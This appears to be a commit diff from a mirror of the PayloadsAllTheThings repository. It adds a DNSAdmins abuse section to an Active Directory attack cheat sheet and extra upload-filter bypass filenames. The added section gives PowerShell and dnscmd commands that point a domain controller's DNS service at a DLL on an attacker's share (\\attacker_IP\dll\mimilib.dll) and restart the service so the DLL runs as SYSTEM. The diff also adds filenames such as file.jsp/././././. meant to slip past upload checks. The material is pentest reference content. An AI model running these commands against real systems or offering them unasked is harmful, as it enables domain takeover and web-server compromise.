mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 10:56:10 +00:00
DNS Admins Group
This commit is contained in:
parent
3066615cde
commit
0c7da8ec41
@ -84,6 +84,7 @@
|
|||||||
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
- [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
|
||||||
- [Pass-The-Certificate](#pass-the-certificate)
|
- [Pass-The-Certificate](#pass-the-certificate)
|
||||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
|
- [Abusing DNS Admins Group](#abusing-dns-admins-group)
|
||||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||||
- [GenericAll](#genericall)
|
- [GenericAll](#genericall)
|
||||||
- [GenericWrite](#genericwrite)
|
- [GenericWrite](#genericwrite)
|
||||||
@ -2583,6 +2584,39 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount
|
|||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Abusing DNS Admins Group
|
||||||
|
|
||||||
|
> It is possible for the members of the DNSAdmins group to load arbitrary DLL with the privileges of dns.exe (SYSTEM).
|
||||||
|
|
||||||
|
:warning: Require privileges to restart the DNS service.
|
||||||
|
|
||||||
|
* Enumerate members of DNSAdmins group
|
||||||
|
```ps1
|
||||||
|
Get-NetGroupMember -GroupName "DNSAdmins"
|
||||||
|
Get-ADGroupMember -Identity DNSAdmins
|
||||||
|
```
|
||||||
|
* Change dll loaded by the DNS service
|
||||||
|
```ps1
|
||||||
|
# with RSAT
|
||||||
|
dnscmd <servername> /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll
|
||||||
|
dnscmd 10.10.10.11 /config /serverlevelplugindll \\10.10.10.10\exploit\privesc.dll
|
||||||
|
|
||||||
|
# with DNSServer module
|
||||||
|
$dnsettings = Get-DnsServerSetting -ComputerName <servername> -Verbose -All
|
||||||
|
$dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll"
|
||||||
|
Set-DnsServerSetting -InputObject $dnsettings -ComputerName <servername> -Verbose
|
||||||
|
```
|
||||||
|
* Check the previous command success
|
||||||
|
```ps1
|
||||||
|
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
|
||||||
|
```
|
||||||
|
* Restart DNS
|
||||||
|
```ps1
|
||||||
|
sc \\dc01 stop dns
|
||||||
|
sc \\dc01 start dns
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
### Abusing Active Directory ACLs/ACEs
|
### Abusing Active Directory ACLs/ACEs
|
||||||
|
|
||||||
Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
|
Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
|
||||||
|
@ -65,7 +65,8 @@
|
|||||||
* Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed.
|
* Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed.
|
||||||
* Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg`
|
* Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg`
|
||||||
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
|
* Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
|
||||||
* Slash: `file.php/`, `file.php.\`
|
* Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp`
|
||||||
|
* Multiple special characters: `file.jsp/././././.`
|
||||||
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
|
||||||
* `Content-Type : image/gif`
|
* `Content-Type : image/gif`
|
||||||
* `Content-Type : image/png`
|
* `Content-Type : image/png`
|
||||||
@ -161,4 +162,5 @@ When a ZIP/archive file is automatically decompressed after the upload
|
|||||||
* [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
|
* [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
|
||||||
* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
|
* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
|
||||||
* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
|
* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
|
||||||
* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
|
* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
|
||||||
|
* [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/)
|
Loading…
Reference in New Issue
Block a user